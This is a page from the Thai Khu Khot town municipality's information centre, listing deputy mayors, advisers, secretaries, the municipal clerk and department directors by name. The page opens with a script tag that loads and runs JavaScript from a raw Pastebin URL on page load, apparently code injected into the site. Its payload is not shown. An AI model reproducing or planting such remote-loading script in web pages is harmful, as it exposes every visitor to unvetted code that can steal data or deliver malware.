<script type="text/javascript" src="https://pastebin.com/raw/xi49pjcU"></script>

นายณรงค์ อู่ทรัพย์ รองนายกเทศมนตรี

รองนายกเทศมนตรีนายวีรพจน์ ปานนุ่ม รองนายกเทศมนตรีน.อ.พินิจ แช่มจะโปะ  รองนายกเทศมนตรี

ที่ปรึกษานายกเทศมนตรีนายดำรงค์ วัดแก้ว  ที่ปรึกษานายกเทศมนตรี

เลขานุการนายกเทศมนตรีนายละออง ชะเอมเทศ เลขานุการนายกเทศมนตรีนายอภิโชติ อนันต์ไพฑูรย์ เลขานุการนายกเทศมนตรี

ปลัดเทศบาลนางพิมพ์ประไพ  ศักดิ์ธนา ปลัดเทศบาลนางลำดวน โรจน์รัตน์ ผู้อำนวยการกองสาธารณสุขและสิ่งแวดล้อมน.ส.ทิพย์รัตน์ อุนการุณวงษ์ รองปลัดเทศบาลนางสาวเนตรนิล  ลาดพิลา ผู้อำนวยการกองคลังนายอนุสรณ์ คเชนทรพรรค หัวหน้าสำนักปลัดเทศบาลนางพัชรียา  ฟุ้งมงคลเสถียร ผู้อำนวยการกองสวัสดิการสังคม- นางนัยนา  ภูสามารถ ผู้อำนวยการกองวิชาการและแผนงาน

หัวหน้าส่วนราชการ

-  ผู้อำนวยการกองการศึกษา

- ผู้อำนวยการกองช่าง

ศูนย์ข้อมูลข่าวสารเทศบาลเมืิองคูคต